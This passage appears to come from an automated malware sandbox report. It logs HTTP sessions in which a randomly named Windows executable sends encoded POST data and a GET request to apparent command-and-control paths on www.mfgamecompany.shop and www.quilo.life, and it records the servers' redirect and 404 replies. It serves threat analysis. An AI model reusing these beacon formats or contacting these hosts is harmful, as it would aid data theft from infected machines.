                      Data Raw: 63 68 48 54 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4f 41 5a 7a 55 76 67 78 4f 57 53 34 52 79 55 31 48 59 6f 30 2f 48 52 50 31 38 52 39 34 68 45 6a 51 63 37 61 6c 46 7a 54 2b 72 51 35 49 62 6b 53 31 42 45 2f 36 76 6f 44 4f 61 46 44 33 32 6b 48 2f 56 37 53 2b 6c 37 46 57 34 30 34 6d 44 31 44 66 45 54 37 6b 63 44 66 4d 69 4f 42 51 35 50 4c 6e 4c 4c 52 36 39 67 4f 76 70 6d 76 77 53 75 66 68 71 62 35 6e 4c 7a 4b 75 6f 33 42 77 47 31 4d 64 6c 68 44 36 6a 61 55 62 50 35 77 5a 57 6b 54 47 4f 57 76 48 4d 63 74 4e 6d 47 50 39 73 34 33 74 47 6a 70 4a 2b 47 47 51 39 6a 57 51 66 48 78 55 32 4b 65 67 3d 3d
                      Data Ascii: chHT=u91ZDexvlNKHJOAZzUvgxOWS4RyU1HYo0/HRP18R94hEjQc7alFzT+rQ5IbkS1BE/6voDOaFD32kH/V7S+l7FW404mD1DfET7kcDfMiOBQ5PLnLLR69gOvpmvwSufhqb5nLzKuo3BwG1MdlhD6jaUbP5wZWkTGOWvHMctNmGP9s43tGjpJ+GGQ9jWQfHxU2Keg==
                      Sep 10, 2024 08:49:18.882579088 CEST1086INHTTP/1.1 301 Moved Permanently
                      Connection: close
                      content-type: text/html
                      content-length: 795
                      date: Tue, 10 Sep 2024 06:49:18 GMT
                      server: LiteSpeed
                      location: https://www.mfgamecompany.shop/lwt6/
                      platform: hostinger
                      panel: hpanel
                      content-security-policy: upgrade-insecure-requests
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.449751185.173.111.76801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:20.907115936 CEST760OUTPOST /lwt6/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mfgamecompany.shop
                      Origin: http://www.mfgamecompany.shop
                      Referer: http://www.mfgamecompany.shop/lwt6/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 56 45 67 31 34 37 62 68 5a 7a 47 2b 72 51 68 34 61 75 57 31 42 4c 2f 36 71 66 44 4d 65 46 44 7a 65 6b 48 39 4e 37 54 4a 35 30 46 47 34 32 78 47 44 33 4a 2f 45 54 37 6b 63 44 66 4e 48 72 42 51 68 50 4c 58 37 4c 52 59 56 6a 49 66 70 6c 6d 51 53 75 62 68 71 66 35 6e 4c 52 4b 75 59 52 42 31 61 31 4d 63 56 68 43 76 58 64 64 62 4f 77 74 4a 58 6e 64 48 6e 6c 69 57 35 73 73 72 71 2b 43 2f 73 39 79 72 58 35 34 34 66 52 55 51 5a 51 4c 58 57 7a 38 58 4c 44 46 6a 76 6d 63 46 46 6a 75 4e 71 41 50 64 4b 64 4d 4f 78 46 4f 75 73 3d
                      Data Ascii: chHT=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LVEg147bhZzG+rQh4auW1BL/6qfDMeFDzekH9N7TJ50FG42xGD3J/ET7kcDfNHrBQhPLX7LRYVjIfplmQSubhqf5nLRKuYRB1a1McVhCvXddbOwtJXndHnliW5ssrq+C/s9yrX544fRUQZQLXWz8XLDFjvmcFFjuNqAPdKdMOxFOus=
                      Sep 10, 2024 08:49:21.558152914 CEST1086INHTTP/1.1 301 Moved Permanently
                      Connection: close
                      content-type: text/html
                      content-length: 795
                      date: Tue, 10 Sep 2024 06:49:21 GMT
                      server: LiteSpeed
                      location: https://www.mfgamecompany.shop/lwt6/
                      platform: hostinger
                      panel: hpanel
                      content-security-policy: upgrade-insecure-requests
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.449752185.173.111.76801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:23.460412979 CEST10842OUTPOST /lwt6/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mfgamecompany.shop
                      Origin: http://www.mfgamecompany.shop
                      Referer: http://www.mfgamecompany.shop/lwt6/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 4e 45 6a 48 77 37 61 47 74 7a 55 4f 72 51 2f 49 61 76 57 31 42 73 2f 2b 47 54 44 4d 43 2f 44 78 6d 6b 47 65 46 37 43 4c 52 30 51 32 34 32 75 57 44 30 44 66 45 61 37 6b 4e 4b 66 4d 33 72 42 51 68 50 4c 52 66 4c 58 4b 39 6a 54 66 70 6d 76 77 53 71 66 68 71 37 35 6b 36 75 4b 76 73 6e 43 42 57 31 56 38 46 68 42 5a 4c 64 41 72 4f 79 75 4a 58 46 64 48 37 36 69 57 6b 56 73 72 32 59 43 39 77 39 7a 74 53 74 73 5a 72 61 48 51 78 61 62 46 65 33 79 6e 50 34 49 51 2f 39 53 56 56 44 30 76 32 55 45 66 37 68 59 66 39 38 4d 4a 32 30 43 66 4b 70 42 4a 47 4a 43 30 33 41 62 6a 48 4b 42 6a 59 46 47 48 57 77 78 66 63 4b 6b 48 4a 2f 4d 56 74 79 66 49 34 48 49 52 35 58 6e 47 41 36 51 77 58 77 76 36 53 30 6f 34 4e 62 35 63 67 38 63 79 77 69 37 37 79 5a 67 39 58 6f 2f 32 4b 6c 75 49 53 45 75 32 46 63 34 45 61 2f 51 46 6a 35 6f 31 52 70 33 2f 41 73 2f 73 4a 52 51 6d 2f 65 4e 50 44 67 48 [TRUNCATED]
                      Data Ascii: chHT=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LNEjHw7aGtzUOrQ/IavW1Bs/+GTDMC/DxmkGeF7CLR0Q242uWD0DfEa7kNKfM3rBQhPLRfLXK9jTfpmvwSqfhq75k6uKvsnCBW1V8FhBZLdArOyuJXFdH76iWkVsr2YC9w9ztStsZraHQxabFe3ynP4IQ/9SVVD0v2UEf7hYf98MJ20CfKpBJGJC03AbjHKBjYFGHWwxfcKkHJ/MVtyfI4HIR5XnGA6QwXwv6S0o4Nb5cg8cywi77yZg9Xo/2KluISEu2Fc4Ea/QFj5o1Rp3/As/sJRQm/eNPDgHR53PglwVFt4WTf1KRIKqMz9I0z+sHuwtTg+5TngTE1GiRUdEmZugNF2Se1+RDkauychFSh3A7jDAR0k2XkBj4h5uGkSAMFDW9DaOwKINNxmy3zt0HJVhY8P1JfjTOZ3cLnYxyrcItjWPcKP6+pfqKCqzqKwi54IwWaj060YMxKiOKH34r9EI9YNMDCkJlyuWbHln3krw7G/WkF1In1ehXAnUPOmjAU6cOSKEYBeotSlL4AIoQTnE+TlihlEF6zF+N/ygpKwEKCN/SDFG+DQH9S6SWxkfWZo5j58m35fxjhubapAJLUWDI8sHZFxu3zU9jsDkOU27WL5y3i5P5RVtd2MheMUIZ0iE/dCUWmMjVqp+UjO8QB0QKnxrEZONFHO7PShN0FciiY5R3t44tX6qEaGzKGhjIF1yoxuBGGX8t2qhWdxlzkMwS91FGbqpeHqjtdlR6RHRVY3FWf3pAGNRnE5I6j85N931zgIeWjZf1gdQoxTEcw7Wbp3yP5qfyQRcSCotF2CigjtzmZsaihbSJnGshbupWmPPTwODxGt+ABuatoTfpsD3aosYr70MwJho7FE2dUVzUY68JHKc4g68HTqy8RhRHRoYXJZWKaMvQYifjwODSA5658cOUMM9hhLkODxGc9W3lnEiKRHtQX1vFZ/306vyh85XI2 [TRUNCATED]
                      Sep 10, 2024 08:49:24.122045040 CEST1086INHTTP/1.1 301 Moved Permanently
                      Connection: close
                      content-type: text/html
                      content-length: 795
                      date: Tue, 10 Sep 2024 06:49:24 GMT
                      server: LiteSpeed
                      location: https://www.mfgamecompany.shop/lwt6/
                      platform: hostinger
                      panel: hpanel
                      content-security-policy: upgrade-insecure-requests
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.449753185.173.111.76801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:26.071441889 CEST465OUTGET /lwt6/?chHT=j/d5AuZ+qvKLIrA4zRH7iumC4FPYuWAbkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZRBEg4xmoLeM9ymATeeiPAi1OIEjfa/hQNNA=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.mfgamecompany.shop
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:49:26.732014894 CEST1230INHTTP/1.1 301 Moved Permanently
                      Connection: close
                      content-type: text/html
                      content-length: 795
                      date: Tue, 10 Sep 2024 06:49:26 GMT
                      server: LiteSpeed
                      location: https://www.mfgamecompany.shop/lwt6/?chHT=j/d5AuZ+qvKLIrA4zRH7iumC4FPYuWAbkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZRBEg4xmoLeM9ymATeeiPAi1OIEjfa/hQNNA=&bd=rj1X_pBPLTnXd0
                      platform: hostinger
                      panel: hpanel
                      content-security-policy: upgrade-insecure-requests
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.449754203.161.43.228801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:32.075406075 CEST716OUTPOST /ftr3/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.quilo.life
                      Origin: http://www.quilo.life
                      Referer: http://www.quilo.life/ftr3/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 66 6b 73 57 6f 41 47 67 6b 63 35 71 79 78 75 33 6d 4e 61 74 50 4e 36 44 6f 79 51 35 52 47 30 6c 69 62 66 35 42 30 41 50 32 51 63 51 43 54 6e 53 6b 53 4f 69 6e 51 68 6f 65 51 76 65 4e 4f 6c 5a 42 35 56 34 64 61 70 2f 65 42 62 4a 36 4b 5a 31 4d 6b 33 31 75 47 32 47 76 67 51 61 4e 2b 76 71 79 64 54 6d 39 2f 7a 66 35 76 74 39 47 31 35 6b 30 53 57 4c 6c 63 59 41 46 58 4f 6d 76 52 6a 79 57 32 68 57 36 49 50 4b 71 35 37 44 44 66 52 31 4d 33 2f 79 64 58 4e 52 58 49 6e 46 72 63 38 77 62 47 79 6c 55 32 57 69 69 41 36 6c 61 4d 49 59 4a 2f 47 4a 51 3d 3d
                      Data Ascii: chHT=2iJzcjLeEdvuVfksWoAGgkc5qyxu3mNatPN6DoyQ5RG0libf5B0AP2QcQCTnSkSOinQhoeQveNOlZB5V4dap/eBbJ6KZ1Mk31uG2GvgQaN+vqydTm9/zf5vt9G15k0SWLlcYAFXOmvRjyW2hW6IPKq57DDfR1M3/ydXNRXInFrc8wbGylU2WiiA6laMIYJ/GJQ==
                      Sep 10, 2024 08:49:32.659810066 CEST658INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:49:32 GMT
                      Server: Apache
                      Content-Length: 514
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.449755203.161.43.228801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:34.660859108 CEST736OUTPOST /ftr3/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.quilo.life
                      Origin: http://www.quilo.life
                      Referer: http://www.quilo.life/ftr3/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 69 30 6d 48 2f 66 34 44 4d 41 49 32 51 63 45 53 53 76 63 45 53 56 69 6e 73 59 6f 62 34 76 65 4d 71 6c 5a 45 39 56 35 75 43 71 2f 4f 42 5a 41 61 4b 62 36 73 6b 33 31 75 47 32 47 76 31 39 61 4f 4f 76 72 43 74 54 30 4a 6a 38 54 5a 76 79 70 57 31 35 76 55 53 53 4c 6c 63 71 41 45 61 54 6d 74 5a 6a 79 57 6d 68 56 75 63 4d 45 71 34 2b 4f 6a 65 65 31 4d 32 61 33 50 65 56 4d 30 73 6a 59 2f 64 61 34 39 58 6f 30 6c 58 42 77 69 6b 4a 34 64 46 38 56 4b 43 50 53 58 62 55 4b 6e 35 4e 50 63 75 74 4a 48 38 32 6b 46 39 50 65 68 67 3d
                      Data Ascii: chHT=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5ii0mH/f4DMAI2QcESSvcESVinsYob4veMqlZE9V5uCq/OBZAaKb6sk31uG2Gv19aOOvrCtT0Jj8TZvypW15vUSSLlcqAEaTmtZjyWmhVucMEq4+Ojee1M2a3PeVM0sjY/da49Xo0lXBwikJ4dF8VKCPSXbUKn5NPcutJH82kF9Pehg=
                      Sep 10, 2024 08:49:35.273550987 CEST658INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:49:35 GMT
                      Server: Apache
                      Content-Length: 514
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.449756203.161.43.228801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:37.217359066 CEST10818OUTPOST /ftr3/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.quilo.life
                      Origin: http://www.quilo.life
